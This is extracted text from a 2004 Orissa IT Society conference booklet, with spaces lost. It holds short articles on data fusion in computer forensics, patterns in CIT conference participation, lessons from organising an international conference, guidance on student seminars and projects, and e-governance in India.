Therefore the government should rethinkand link these management tools in e-governanceenvironment to change the old mindset ofemployees (officials) because technology cantdo everything alone People need transformationin the government as well as the thinking of theperformer who performs the role in the e-Governance initiative Indeed e-Governmentmeans transformation of the government processthrough a series of measurements by applyingnew kinds of methodology and sharing the bestpractices along with knowledge and ideas inthe ICT environment That is the only way torealise our dreams

Raj Kumar Prasad is the Editor of Indian firste-commerce and CEO The Indian Chapter of theCommonwealth Centre for e-Governance and regularspeaker on e-governance and e-commerce worldwide anda thinker for social reform through ICT He is also memberof many world organisations and editorial member of manyInternational journals author can be reached atrajkumarelectronicgovindianet

OITS-2004

16

1 INTRODUCTION

We live in the Information Age and weare consumed by information With the rapiddevelopment of this Digital Information andCommunication Technology (DICT) and theability to conduct business and communicatethrough these revolutionary mediums haspositively impacted upon the social andeconomic well being of the Nation invadingnearly every area of modern life The currentstate-of-the-art of different security systems isrelatively primitive with respect to the recentexplosion in computer communicationscyberspace and electronic commerceOrganizations fully realize that cyberspace is acomplex realm of vital information flows withboth enabling and inhibiting technical factors

APPLICATION OF DATA FUSION IN COMPUTERFORENSICS

Sateesh Pradhan1 amp Suneeta Satpathy2

1 Research Fellow Directorate of Forensic Sciences GEQD Hyd2 Dept of Computer Science and Application Utkal University Bhubaneswar

Since Internet-related legislation is not yetmature and the infrastructure of information andcommunication society is still underconstruction there is always a space for illegalopportunists to commit crime which iscommonly known as Computer Frauds andCyber Crime (CFCC) While information isempowerment the sheer magnitude of theinformation we collect as well as the sensitivityof much of it necessitates that we be cautious inits maintenance storage and protectionIdentifying tracking classifying and assessinghostile and inhibiting activities in this ever-growing complex dimension is an enormous andfascinating technical challenge This is a problemthat has put a major impact in whole worldwideweb in the developed and developing countries

ABSTRACTIn the current age of Digital Information and Communication Technology (DICT) the potential for crushing

availability of data largely without meaning has become a reality Business has become increasingly dependenton the Internet and computing to operate Everywhere the individuals and the organizations are drowning in dataand information and starved for knowledge and understanding This problem has put a major impact worldwidein all the developed and developing countries One of the keys to solve this problem is Data and InformationFusion Data Fusion systems are being proposed for a wide variety of applications around the world by whichmore efficient and cost effective systems can be developed The desire to obtain the maximum benefit fromexpensive sensors and information systems has prompted this interest But the Legal support criminal justicedelivery system and international cooperation have not kept pace with the technological advancements which have takenplace with the advent of information technology Also it has become apparent that there are issues of evidencegathering in a computing environment which by their nature is technical and different to other forms of evidencegathering This paper provides a functional overview of the art and science of multisensor Data Fusion technologyand how it can enhance the performance and reliability of Advanced Security Management Systems and ComputerForensics (CF) and hence extend a further hand to the Law Enforcement and Forensic Investigating Agencies

Keywords Digital Information Technology (DICT) Data Fusion Information Fusion Computer Forensics (CF)Potential Legal Digital Evidence (PLDE)

OITS-2004

17

One of the keys to solve this problem is Dataand Information Fusion The techniques of DataFusion are designed to provide information ofa higher quality than could be obtained by usinga set of sensors independently The no of factorsthat allow the integration of data to be beneficialare

1 Redundancy2 Complementarities3 Timeliness4 Cost of the information

So the Law-Enforcement Agencies has aclear role to protect the informationinfrastructure which is critical to nationalsecurity and protect the public from criminal ormalicious activity occurring through theseelectronic mediums By explaining the nature ofthe vulnerabilities faced by the organizationstoday and discussing the problems this paperoffers an introduction to some of the technicalissues surrounding this new and specializedfield of Data Fusion and its application inComputer Forensics to identify and describesources of evidence to help the Law Enforcementand Forensic Investigating Agencies

2 ELEMENTS AND OBJECTIVES OFCOMPUTER FORENSICS

Computer forensics is the study ofcomputers and networks as they relate to legalprocesses The objective of Computer Forensicsis to learn about computer systems and networksand the information they contain and to do itin such a way that the knowledge can be usedin legal proceedings It is defined as anapplication of computer investigations andanalysis techniques in the interests ofdetermining Potential Legal Digital Evidence

Computer specialists can draw on an arrayof methods for discovering deleted

encrypted or damaged file information(Robbins 1997)

There are four steps in ComputerForensics [3]

1 Identify the evidence2 Preserve the evidence3 Analyze the evidence4 Present the evidence

Objective

1 Recovery Evidence preservation Damage control System restoration

2 Causation (Problem source)3 Proof Evidence Analysis Prove it to prevent future incidents

The tools and processes used in thecollection preservation and analysis ofComputer Forensics evidences are different foreach situation and computer system or network

3 DATA FUSION

Data Fusion is the process of combininginformation from a variety of sensors to producea unified result It can also be defined as a processof combining complementary information frommultiple sensor data to generate a single datathat contains a more accurate description of thescene than any of the individual source dataThe purpose is to merge the data coming fromdifferent information sources and the motivationis to provide information about a scene notobtainable from a single source or to reduce theuncertainty associated with data coming fromsingle source The fusion process ideallygenerates a single composite data that representsall the useful information from a set of data of

OITS-2004

18

different sensors thus removing the problemsinherent in frame-by-frame evaluation andimproves the data interpretation and recognitionby taking advantage of the complementarycharacteristics of different sensors

31 Advantages of Data fusionThe advantages gained through the

synergistic use of multisensory information canbe decomposed into a combination of fourfundamental aspects the redundancycomplementarily timeliness and cost of theinformation which can then be defined as thedegree to which each of these four aspects ispresent in the information provided by thesensors It also provides the following potentials

1Information from multiple viewpoints2 Extended coverage3 Improved accuracy4 Robust and fault-tolerant operation

32 Application and Potential opportunities ofData Fusion in Computer Forensics

Application of Data Fusion in variousfields

Data-fusion technology has been appliedmost prominently to military applications suchas battlefield surveillance and tactical situationassessment Data fusion has also emerged incommercial applications such as roboticsmanufacturing medical diagnosis and remotesensing [11 13 14] In a typical militarycommand and control (C2) system data fusionsensors are used to observe electromagneticradiation acoustic and thermal energy nuclearparticles infrared radiation noise and othersignals [12] In cyberspace security systems thesensors are different because the environmentaldimension is different Instead of a missilelaunch and supersonic transport through theatmosphere cyberspace sensors observeinformation flowing in networks However justas C2 commanders are interested in the originvelocity threat and targets of a warhead thesecurity personnels are interested in the identityrate of attacks threats and targets of maliciousintruders and criminals

Sensor 1

Sensor n

Data

Acquisition

Data

Fusion

Feature Extraction and Interpretation

Identify required

data

PROCESS OF DATA FUSION

The fusion process opens a way to reacha better analysis and understanding of the datafrom the viewpoint of accuracy andor reliabilityby providing enhanced information frommultiple sources [1 7 16] When the sensorsprovide information about the same aspect of aspecific entity the redundancy can be used toincrease accuracy and reliability The inherentparallel nature of using the multiple sensorsmeans that these systems usually operate fasterthan a single sensor could One way of accessingthe performance of such type of fusion systemis to measure the enhancement or thedegradation in the information provided by thesystem

Data + Algorithms + Knowledge = Data Fusion

Fusion Techniques

There are various types of fusion techniques

1 Low level fusion2 Medium level fusion3 High level fusion

OITS-2004

19

In CFThe major goal of Computer Forensics is to

develop and apply the scientific methods infinding the solutions driven by practitionerrequirements and addressing the needsconsidering the current paradigms Profilingidentifying tracing and apprehending cybersuspects are the important issues of researchtoday The ultimate goal is to obtain sufficientevidence in order to trace the crime back to thecriminal Within a computer system theanonymity afforded the criminal encouragesdestructive behavior while making it extremelydifficult for Law Enforcers to prove the identityof the criminal Therefore the ability to obtainthe fingerprint of the users is imperative toacquire some hold on identifying the perpetrator

The studies of available Log files alwaysstand as fundamental in evidence collection Butat a higher level it is necessary to possess a morein depth ability to narrow the field or evenestablish a list of possible suspects So the needof the hour is to develop a concept frameworkto assist Law Enforcement and ForensicInvestigating Agencies to gather the digitalevidences against electronic crimes bydeveloping methodology tools technology andprinciples for analysis and examination leadingto PLDE for expert testimony in the Court of Law

Multisensor Data Fusion provides animportant functional framework for buildingAdvanced Security Management systems andcyberspace security awareness A significantchallenge remains for security systems designersto combine the data and information fromnumerous heterogeneous distributed systemsinto a coherent process that can be used toevaluate the security of the cyberspace

Multisensor data-fusion technology is animportant avenue on the road toward the

development of highly reliable security-decisionsystems that identify track and assesscyberspace situations with multiple complexthreats The output of Fusion-based securitysystems will be the estimates of the identity(location) of a threat source the maliciousactivity taxonomy of the threats the attack ratesand an assessment of the potential severity ofthe projected target(s) This information can beused for gathering the Legal Digital Evidence toprovide timely Justice and punish the criminalby efficiently and timely analyzing the cases4 CONCLUSION

There exist significant opportunities andnumerous technical challenges for thecommercial application of Data Fusion theoryinto the art and science of cyberspace securitysystems The data fusion process is in the veryearly stages of technical development Howeveras networks continue to grow and the expandingrealms of cyberspace evolve there will be anurgent need to drive various securitymanagement systems towards next-generationcapabilities Determining the origin of highlysophisticated damage in cyberspace willcontinue to grow in complexity as attackersbecome more cyberspace astute So the futureSecurity systems tracking coordinatedmultifaceted cyberspace attacks require clusteranalysis techniques adaptive neural networksand rule-based knowledge systems

Multisensor Data fusion is a multifacetedengineering approach requiring the integrationof numerous diverse disciplines such asstatistics artificial intelligence signalprocessing pattern recognition cognitive theorydetection theory and decision theory Integratedsensor and decision support tools are emergingrequirements for robust and reliable AdvancedSecurity management systems in complexinternetworks

OITS-2004

20

5 REFERENCES

[1] wwwdatafusionorg

[2] Approaches to improve automation forsecurity Cyber Information Assurance ampDecision Support (CIADS) InformationSystems Laboratory Applied ResearchLaboratories the University of Texas atAustin

[3] Handbook of Computer Crime InvestigationForensic Tools amp Technology by EoghanCasey (Editor) Academic Press 2002

[4] Internet Engineering Task Force NetworkWorking Group Guidelines for the SecureOperation of the Internet RFC1281Available on line ftpinfocertorgpubietfssphwg

[5] Policies to Enhance Computer and NetworkForensics Proceedings of the 2001 IEEEWorkshop on Information Assurance andSecurity United States Military AcademyWest Point NY 5-6 June 2001

[6] Hochberg et al NADIR An automated systemfor detecting network intrusion andmisuse Computers amp Security 1993Elsevier Science New York 235248

[7] D L Hall and J Llinas An introduction toMultisensor data fusion In Proceedingsof the IEEE vol 85 ndeg 1 pp 6-23 1997

[8] L A Klein Sensor and data fusion conceptsand applications Tutorial texts vol TT14 SPIE Optical Engineering Press USA131 p 1993

[9] Waltz E Information Warfare Principles andOperations 1998 Artech House BostonMA

[10] Hall D Mathematical Techniques inMultisensor Data Fusion 1992 ArtechHouse Boston MA

[11]L F Pau Sensor data fusion Journal ofIntelligent and Robotics Systems vol 1pp 103-116 1988

[12] DSTO (Defence Science and TechnologyOrganization) Data Fusion SpecialInterest Group Data fusion lexiconDepartment of Defence Australia 7 p21 September 1994

[13] Varshney P Distributed Detection and DataFusion 1995 Springer-Verlag NewYork NY

[14] Wald L A European proposal for terms ofreference in data fusion InternationalArchives of Photogrammetry and RemoteSensing Vol XXXII Part 7

[15]Cyber Forensics by Simson Garfinkel

[16] Waltz E and Llinas J Multisensor DataFusion 1990 Artech House Boston MA

OITS-2004

21

The Conferences on InformationTechnology or CITs as they are more popularlyknown have been organised by the OrissaInformation Technology Society every year since1998 It was the first ever internationalconference on IT to be held in Orissa and becamean instant hit The overwhelming success of thisedition conveyed the message that not only hadCIT arrived but it was here to stay Apart fromtheir successes academically these conferencesalso present some interesting patterns regardingthe multiplicity of the authors their regions aswell as the areas of research1 Multiplicity of authors

The papers presented in these conferenceshave had authors ranging between one andseven However it has been found that papershaving two and three authors have dominatedwhile papers having five or more authors havebeen few and far between (Fig1) The onlyexception came in the first edition when papershaving two authors comprised more than three-fifths of the total number of papers (Fig2) Thedetails of the multiplicity of authors have beenpresented in Table 1 which is drawn

Interesting Patterns in CITsA Misra

Silicon School of Information TechnologySilicon Hills Patia Bhubaneswar-751031

aurabindasiliconacin

2 Regions of participations In this section we will consider the

participating regions in terms of countries aswell as institutes With India being the hostcountry she has the maximum representationunderstandably But if we look at the trends inthe participation of other countries we can alsoobserve certain interesting patterns

Firstly the United States has the highestrepresentation from overseas having at least oneauthor in thirty-five papers over the six editionsIt is followed by Japan (11) and Australia(10) inthat order (Table 2) It may be noted with interestthat there were three papers from Brazil in the1999 edition but those are the only papers fromBrazil till date Besides there are about twelvecountries which have only one occurrence whileUSA and Japan have been represented in everyedition

However one discouraging factor has beenthe sharp decline in overseas participants overthe six editions (Fig 3) While in the first edition5405 of the papers had at least one overseasauthor the figure has been hovering around the25 mark in the last four editions In spite ofthis 2003 has recorded the highest number ofpapers having overseas particpation ietwenty-one

On the contrary papers from Orissa havebeen increasing steadily every year which hasbeen shown in Fig 4

As far as Institutes are concerned then theIITs have been the most prominent with theexceptions of IIT Delhi and IIT Roorkee whichhave respectively six and one one contributions

Number of authors per paperYear 1 2 3 4 5 6 71998 6 21 8 1 1 0 01999 8 12 13 8 1 2 02000 5 15 12 1 0 0 12001 3 20 24 5 1 0 02002 4 16 17 4 0 2 02003 9 34 33 4 3 0 0

Table 1

OITS-2004

22

Multiplicity patterns

Fig 11998

Fig 2

age of papers involving overseas au thors yearwise

Fig 3Year

Year

OITS-2004

23

till date Leading the pack are IIT Kharagpurwith thirty-five papers and IIT Guwahati withtwenty-seven Among the other IITs IIT Kanpurhas seventeen while IIT Bombay and IIT Madrashave nine apiece Among the other InstitutesJadavpur University has contributed seventeenpapers while University of Hyderabad hascontributed ten The list of the leading Institutesin terms of number of papers alongwith ayearwise breakdown is given in Table 3

Another interesting trend that can beobserved here is that while the USA leadsoverseas list none of the Institutes figure in thelist while one Institute from Japan figures in thelist It can be concluded that the papers from the

Country 1998 1999 2000 2001 2002 2003 TotalUSA 6 10 3 8 1 7 35

Netherlands 2 0 1 0 0 0 3Japan 2 3 1 3 1 1 11

Australia 3 0 1 1 2 3 10Kuwait 1 0 0 0 0 0 1China 1 0 0 0 0 1 2

Sweden 1 0 0 0 0 0 1UK 1 0 0 0 2 3 6

Portugal 1 0 0 0 0 0 1Italy 1 2 1 1 1 0 6

Canada 1 1 0 0 1 3 6Taiwan 0 1 0 0 0 0 1Brazil 0 3 0 0 0 0 3

Finland 0 1 0 0 0 0 1Mexico 0 1 0 0 0 0 1

Germany 0 1 1 0 0 0 2Malaysia 0 0 1 0 1 1 3

Macao 0 0 0 1 0 0 1Thailand 0 0 0 1 0 0 1Norway 0 0 0 1 1 0 2

Singapore 0 0 0 0 1 0 1Serbia amp

Montenegro 0 0 0 0 0 1 1Tanzania 0 0 0 0 0 1 1

Table 2USA have been scattered across the countrywhile those from Japan have been concentratedin some particular Institutes3 The Topics

As far the topics are concernedNetworking leads the table with a total ofthirtythree papers Among other topics ofprominence are Soft Computing with thirty-onepapers Web-based computing with eighteenand Parallel amp Distributed Computing withsixteen papers Even though there have beenpapers from almost all areas of ComputerScience none of those areas have featuredconsistently in these conferences

OITS-2004

24

Trends in papers having authors from Orissa

Fig 4

Bibliography1 Mahapatra RN ed CIT 98 Trends in

Information Technology Tata McGraw-HillNew Delhi

2 Mohanty H and Baral C ed CIT 99 Trendsin Information Technology Tata McGraw-Hill New Delhi

3 Ghosh RK and Misra D ed CIT 2000Proceedings of Third InternationaConference on Information Technology TataMcGraw-Hill New Delhi

Institute 1998 1999 2000 2001 2002 2003 TotalIIT Kharagpur India 5 0 3 8 5 15 36IIT Guwahati India 1 7 4 6 5 4 27

Jadavpur University India 5 3 0 5 2 2 17IIT Kanpur India 3 1 1 6 2 4 17

University of HyderabadIndia 0 1 0 5 1 3 10

IIT Bombay India 1 3 2 1 1 1 9IIT MadrasIndia 0 0 1 2 3 3 9Iwate PrefecturalUniversity Japan 2 1 1 2 1 1 8

Table 34 Pujari AK and Mohapatra P ed CIT 2001

Proceedings of Fourt InternationalConference on Information Technology TataMcGraw-Hill New Delhi

5 Iyer S and Naik S ed CIT 2002 Proceedingsof Fifth International Conference onInformation Technology Tata McGraw-HillNew Delhi

6 Chakraborty G and Sarkar S ed CIT 2003Proceedings of Sixth InternationalConference on Information Technology TataMcGraw-Hill New Delhi

Year

OITS-2004

25

Conference is an academic activity thatallows researchers from a particular field topresent their findings and take suggestions andcomments from peers Academicians who arenot even presenting papers also attend theconference in order to keep themselves abreastof developments in the particular field and alsoto network with other attendees for possibleresearch collaboration In academic world thereis always the pressure of publish or perishConferences are an outlet to help academiciansto publish

While western world has already masteredthe art of holding conferences developingcountries are slowly gearing up to hosting qualityconferences A quality conference in generalrequires both quality and quantity ofparticipation until and unless the conference isvery narrowly focused Holding a conferencerequires quite a bit of pre-preparation andplanning The conference team needs to managethe logistics of interacting with a large numberof authors reviewers invited speakers potentialsponsors and delegates besides maintaining dayto day communication among all the teammembers This article enumerates the strategiesadopted to enhance both the quantity andquality aspect of an international conference1 inthe area of information technology held inDecember 2003 This conference was successfulin terms of participation management and otheraspects as expressed by various attendees of theconference and also in comparison withprevious conferences held by the same group

Experiences amp Learning from Organising anInternational Conference in a Developing Country

Laxman MohantyPhD Scholar BITS-Pilani

T-10 IIM Campus Vastrapur Ahmedabad-380015

Extending the ReachThe first and foremost challenge for a

conference is to reach to potential authors andthen attract as many delegates as possibleThough the particular conference had been heldconsecutively for last 5 years and had created aname for itself still it remained more or lessconfined to members of the parent associationand their friends It was found that faculty ofmany engineering colleges in India were notaware of the conference but on being told aboutit they showed keen interest to participate in itThus to extend the reach of the conferencefollowing strategies were adopted An e-group was created with the e-mail IDs

found from the proceedings of previousconferences Later this group was extendedusing e-mail IDs received from manypostings received in other e-groups likeBytesforall and IDs received from anotherteam member This e-group was used tobroadcast the call for paper (CFP)announcement 2 to 3 times Request was alsomade to members to forward the call forpaper to all people they knew and whowould be interested in the conference

An address list of engineering colleges ofIndia derived from the approved list ofengineering colleges of All India Council ofTechnical Education (AICTE) was preparedThis list was enriched by the addresses ofIndian Institutes of Technology (IITs)National Institutes of Technology (NITs)Indian Institutes of Information Technology

1 The author was the Organising Chair of theConference

OITS-2004

26

(IIITs) all RampD centers of Council ofScientific amp Industrial Research (CSIR) andother special institutions like Center forDevelopment of Advanced Computing (C-DAC) National Center for SoftwareTechnology (NCST) etc This list was usedto send the CFP poster so that facultyconcerned there could participate in theconference

A specific website was registered and usedto disseminate all information regarding theconference This website was also registeredwith several search engines All theconference documents carried the addressof this website The website also carried allcontact details of the organizing team

The website also carried links to four otherrelated conferences happening about at thesame time in the country and similarly thoseconference websites also provided links tothe website of this conference This crosslinking helped all the conferences to beknown to a large number of potentialparticipants

An address list of magazine and journalsrelated to IT and higher education likeUniversity News and Data Quest wasprepared and a brief write up about theconference was sent to those periodicalsMost of these magazines carried theinformation about the conference Thismethod worked well as judged from severalenquiries received which referred to thenews article in University News

Attracting Large Number of DelegatesThe second task was to attract large

number of delegates A focused effort was madefor achieving this Two separate documents wereprepared Advance Program booklet thatcontained details of the technical session and aposter for special events A symposium on ITamp Education industry session on Sustaining

Indias leadership in IT and student tutorialswere organized as three special events to havelarger public participation in the conferenceBoth the Advance Program booklet and theSpecial Events poster were sent by post to theauthors whose papers were selected and thespeakers who were invited for various talksThere were two fold reasons for this strategy 1)Authors and speakers would know details ofthe program and 2) they would use those twodocuments to invite their colleagues to theconference It was assumed that those authorswould take greater interest in spreading theinformation about the conference as comparedto the communication sent as a generic mail tothe head of the institution

The poster which contained details aboutspecific public events was distributed amongthe teachers of schools and colleges industryprofessionals and policy makers in the citywhere the conference was being held It was doneto enhance local participation in those publicevents

The conference was able to attract 246papers from 11 countries and this was almostdouble of what earlier conferences could attractIn fact this large number of papers increasedthe task of the Program Chairs beyondexpectation and they had to recruit morereviewers This also doubled the task ofinforming authors about the status of theirpapers acceptancerejection and finallydirection for final submissionCoordination Among the Organizing Team

The conference team consisted ofprofessionals working in various institutionsspread over different countries like India Japanand USA In India the members were fromdifferent cities Owing to team members beinglocated physically in different places physicalmeeting and planning were eliminatedCyberspace was extensively used to plan and

OITS-2004

27

decide various issues regarding the conferenceThree specific e-groups were created for variousrequirements Egroup1 This e-group contained the e-mail

IDs of the chairs of the conference It wasused to appraise other members regardingwho is doing what Also suggestions weresought for various issues such as publishersto be approached for proceedings who wereto be invited for keynote and special talksand which places to be included in the sightseeing tour etc

Egroup2 This e-group was a super set ofegroup1 and contained e-mail IDs of chairsof the present conference and the pastconferences It was assumed that this groupby being involved in 6 editions of thisconference (including the current one) helda large knowledgebase that can be used tosort out various policy issues regarding theconference For example issues likeregistration fee what type of tutorials andwhat facilities to be extended to variousinvited speakers were discussed anddecided upon through this e-group

Egroup3 This e-group comprised of themembers of the parent association of theconference This e-group was used to keepthe group members informed about thedevelopments of the conference and alsogalvanize support for participation andpublicity

Several members of the parent associationobserved during the conference that though theywere not actively contributing to any discussionin the e-group yet they were happy to get allstatus reports about the conference and be partof the discussions among the members

Besides these groups a large number of one-to-one and one-to-many e-mail exchanges weremade to facilitate information sharing anddecision making

It may be noted that the organizing team ofthe conference acted more like a virtual team withmembers physically located at various placesin the world Interestingly many members didnot know other members personally Thus it wasdecided that in the website the name of eachconference chair will be linked to hisherpersonal web pages so that other members canlook at those pages and become familiar withthe persons they are workingReviewing the Papers

Receiving papers reviewing theminforming the authors about the acceptancerejection of their papers and finally receivingthe camera ready papers are some of the criticalfunctions that needed to be done with great careCyberspace was extensively used to carry outthese activities thus making execution of tasksfaster accurate and inexpensive Though therewas no facility for online submission authorscould e-mail their papers to either of the ProgramChairs Each paper was to be reviewed by atleast two reviewers Private HTML pages werecreated to facilitate this review process TheseHTML pages carried the following informationabout the papers submitted - numbers titleswhether reviewers found or not for a given paperand if found whether two reviewers were foundReviewers were given the access to those pagesand were asked to select the papers which wereyet to be allotted for review and the ones theywould like to review They could then downloadthe concerned papers for review E-mails wereused to receive reviews from the reviewers andcommunicate the same to authors withselection rejection status of their papers Finalpapers were also received through e-mails fromthe authorsDelegation

Though the committee of chairs wasresponsible for all basic activities yet it was notpossible for this committee to handle allresponsibilities especially those related to local

OITS-2004

28

arrangements Thus a committee of coordinatorsfor various activities was formed to handlevarious sub functions For example acoordinator was especially designated to lookafter accommodation and local conveyance ofguest speakers and delegates The conferencewas providing accommodation to around 20 oddguest speakers and they were to reach the venueat different dates and times and from differentcountries Receiving them putting them up inhotels and enabling them to reach the conferencevenue were all complex tasks and needed fulltime attention of one person

Besides accommodation and localconveyance there were coordinators forregistration arrangement at the conferencevenue poster session and special programs etcThe details of this coordination team were putup on the website and delegates were informedthrough e-mails to get in touch with the relevantcoordinator for their queries and requirementsThe coordinators were the faculty members ofthe host college and each coordinator wasassisted by a team of student volunteers fromthe same college

This arrangement not only ensured smoothfunctioning of the conference it increasedinvolvement of a large number of facultymembers The coordinators also appreciated therecognition they received For student volunteersit was a great learning opportunityExtending the Scope of the Conference

By nature a conference is an academicfunction and only involves researchers andacademicians from different institutions But thisconference was designed also to accommodatestudents industry representatives and teachersfrom schools and colleges Three special eventswere organized for this target group asymposium for educators an industry sessionfor students researchers and teachers andtutorials specially designed for students Allthese sessions were very successful and attracted

a large number of participants from the city Thusthe conference could benefit the community inthe local contextThe Financing Model

The conference also had a unique financingmodel Its registration fee was kept sufficientlylow to attract large number of participants Thusthe registration fees alone were not sufficient tomeet all the expenses Though the conference isorganized by an association in reality a localengineering college takes the lead every year inhosting it while other colleges provide financialsupport So a large part of the financialrequirement was met by the contribution fromthe local engineering colleges In return thesecolleges were given free registration for certainnumber of participants in the conference andthe tutorials

Tutorials were designed in such a way(content duration course materials and otherfacilities wise) that participants would not mindpaying to attend them Independentsponsorships were sought from local collegesfor special events and this was acknowledgedduring the event Besides association membersstaying abroad were able to garner a large chunkof financial support from some corporates Govtorganization like CSIR also extended somesupport The conference was able to generate asmall surplus besides meeting all its needs Thissurplus is given to the parent association to carryout computer awareness activitiesConclusion

The whole experience of being part of theorganizing team that carried out planningdesigning and organizing of the conferenceshowed that by bringing in innovation todifferent dimensions of the conference a teamcan not only enhance both the quality andquantity of participation among variousstakeholders it can turn the whole experienceinto an enriching and fun filled experience

OITS-2004

29

Guiding Seminars and Projects for UndergraduateEngineering Students

MN DasProfessor amp HOD

Computer Science amp Engineering and IT

IntroductionConduct seminar presentation and projects

for undergraduate engineering students in theirfinal year is an important and statutory part ofany university curriculum Seminar measuresmostly the external abilities and projectmeasures the internal abilities of a studentThrough seminar besides the technicalknowledge the presentation communicationand interpersonal skills of a student also getreflected Through project the depth of technicalknowledge acquired amp degree of understandingon fundamentals of engineering subjects by thestudent get evaluated Also to some extent thepresentation skills of a student gets reflect whenhe or she submits the project report and presentsbefore the audience (examiners studentcolleagues etc) A student goes through varietiesof engineering subjects (both theory andsessional) during his or her engineering studtyThese papers are mainly divided into twocategories (i) Core papers amp (ii) Supportingpapers Seminars and projects are based on thethorough understanding of all these papers bythe students Besides these course curriculumknowledge the projects amp seminars are alsobased on the extra or additional knowledgeacquired by the students by going throughvarious journals magazines research papersCDs internet amp reference books etc and byattending several tutorials workshopsseminars conferences symposiums andtechnical competitions etc

In short seminar and project are one typeof indicators of a students mental capability and

orientation to face and accept the practical andtechnical challenges in the real scenarios infuture

Role of faculty members as guides aco-guides

A student needs active support from his orher guide or co-guide for preparing himself orherself to present seminar and carrying out aproject work successfully Normally this guideis one of the faculty members of the concerneddepartment But some cases when a studentcarries out a project work in an organizationother than his or her institute a member of thatorganization becomes the guide However inthat case one of the faculty members of thedepartment must become a co-guide The role orthe co-guide is very important in the sense thathe or she has to orient the project done by thestudents as per the University guidelines Aseminar can be presented individually or ingroup (normally no of group members shouldnot exceed 3) Each Seminar team (either onemember or multiple members) must be linkedwith a guide called seminar guide Similarly aproject can be done individually or in group(normally no of group members should notexceed 5) Each project team (either one memberor multiple members) must be linked with a guideor co-guide called project guide or project co-guide Selecting a guide by a student group orvice versa is normally done through mutualconsultation Head of the department can playthe role of a negotiator in this situation For abetter focus and attention no of project teamsunder the supervision of a project guide or co-

OITS-2004

30

guide should not exceed 2 and no of seminarteams under the supervision of a seminar guideshould not exceed 4 Each group (either projector seminar) must submit an abstract or synopsisof the work to be done or presentation to be madeto their respective guides sufficiently before thecommencement of project work or seminarpresentation Seminar guides must ensure thattopics of seminars are of advanced amp state-of-the-art type These topics should not be from theUniversity course curriculum but can be basedon the basics of these subjects A schedule forthe seminar presentations should be notified byHOD to all concerned in a tabular manner withthe following fields representing the columns

rapport with them by directly speaking andby using proper eye contact A keennessshould be shown to them that thispresentation is for their learning amp benefitonly

b) The Middle bit is usually longest and canhave several sections This is structured witha logical sequence Movement from one areaor topic to another is done using verbal orvisual links OHP or LCD acetates are usefulfor breaking the middle bit up into smallerchunks

c) The End of the presentation should be asummary a conclusion a logical end to whathas gone before

iii) PracticeA number of practices should be made

about the presentation in front of the mirror infront of the cat before friends amp on ones ownetc If possible the audio visual equipments likeOHP LCD etc can be tried out before the actualday of presentations During practice feed backcan be obtained from friends regarding thespeaking speed (ie whether too fast or too slow)the visual aids (whether clear or not) logicalmovement of sequence (whether correct or not)amp overall performance (whether excellent goodor poor etc)

Following hints amp tips may be followedduring practice or at the time of actualpresentation Breathe slowly it calms you down Speak audibly but dont shout Speak at normal pare not very fast not

very slow Speak clearly Be enthusiastic Avoid using jargons and colloquialisms

unless these are familiar to the audience Be aware of your gestures

Date Time Slot Group Title of Formatof topic presentation

(LCD OHP)

Guidelines for Seminar Presentation3 PS Preparation Planning amp practicei) PreparationPreparation for seminar presentation can

be effectively done if the following questions areasked to themselves by the students concerned What do I want the audience to LEARN or

DO as a result of my presentation How can I keep the audience interested Do I know my subject

Fundamental rule is that keep itstraightforwardly simple which is abbreviatedas KISS

ii) Planning-Any form of communication should have

a structure Beginning a Middle bit and anEnda) The Beginning should tell the audience

what the presenter(s) is going to tell them Itshould be positive Presenter should engagethe audiences attention and establish

OITS-2004

31

Use large fonts if LCD or OHP are beingused

Learn from watching others follow thestrength amp reject the weaknesses of otherspeakers

Use lots of figures diagrams charts ampgraphs etc

Point to the projection (screen) not thesource

Maintain the timing perfectly

Guidelines for Project Presentation(We have assumed that project guides

project teams amp topics of the projects havealready been finalized)1st Step- Write the abstracts or synopsis of theproject2nd Step- Set a realistic timeframe

Assuming 100 effectives working days ina semester the following is a sample break upDefine your problem - - - - - - - -Write a proposal - - - - - - - -- - -Develop your solution - - - - - - -Implement your solution - - - - -Present your solution - - - - - - -Submit the project report - - - - -3rd Step-

Make proper evaluation amp assessment ofperformance of the students on the basis of finalproducts (results reports and presentation) andthe process by which they were attained Thegrade is given for the entirety of the project Asample grade system may be as followsA a consistently excellent effort that attains

project goalsB a consistently good effort that attains project

goalsC an acceptable effort that at least partially

attains the project goals

D an inconsistent or unsatisfactory effort thatonly partially attains project goals

F an unsatisfactory effort that does not attainproject goals

Tips for writing project reports 1) Sketch the outline of the project2) Expand your outline3) Write your paper4) Rewrite until you get it right

A sample outline for project reports Introduction Background Design Implementation System in Action Results Future work Conclusion ReferenceBesides these the cover page design

acknowledgement topic index index for figuresamp tales etc can be added at proper locations ofthe project report

ConclusionSince projects amp seminars are indicators of

internal amp external abilities of the engineeringstudents the respective faculty guides or co-guides must motivate their students in such amanner that they do not resort to any kind offalse means for carrying out these two mostimportant activities of their student carrer

20 days

20 days

60 days

About the author Prof MN Das is currently Professoramp HOD in the Department of Computer Science ampEngineering at KIIT Deemed University After completinghis BE in Electronics amp Telecommunication branch in1987 from UCE Burla he was with ECIL Hyderabadfor few months in its computer group Then he joinedas a lecturer in the Dept of Electronic amp Tele commengineering dept of UCE Burla and continued upto1987 He completed his ME in Electronics systems ampcommunication during this period He then joined OrissaState Electronic Development Corporation (OSEDC) Ltdfor 1987 amp continued upto 2002 During that period hecompleted his PG Diploma in Management atXIMBAfter a long 16yrs inducted experience in various areashe joined KIIT Deemed University from 2002 onwards

OITS-2004

32

Information and CommunicationTechnology (ICT) has today become an integralpart of governance especially in India ICT isviewed as a tool that will help deliver servicesboth in the public and the private sector to theubiquitous common man What used to takeyears to compile and analyse now takes just afew seconds or minutes

E-governance as a concept involvesleveraging ICT to streamline the administrativeprocess it involves computerisation of recordsfacilitating efficient transactions betweenvarious government departments networkingoffices and using websites and e-mail to bringadministrators closer to people

In the past decade e-governance has beena popular buzzword among politicians andbureaucrats alike especially in India One quasi-Government organisation in Tamil Nadu hasdecided to go the distance by implementing e-governance at a micro level their office is nowcompletely paperless and file-transfer takesplace in an electronic format

Using a tool aptly titled e-Administration Chennai-based ElectronicsCorporation of Tamil Nadu Ltd (ELCOT) withthe help of an Information and CommunicationTechnologies (ICT) organisation called Life-Lineto Business (LL2BCOM) has introduced aworkflow and document management processsans physical movement or use of paper

Designated by the Government of TamilNadu to promote IT industries in the stateELCOT besides supporting IT entrepreneurs also

Case study on ICT and e-GovKrishnan V D G

ICT amp e-Gov Specialistkrisdevgmailcom

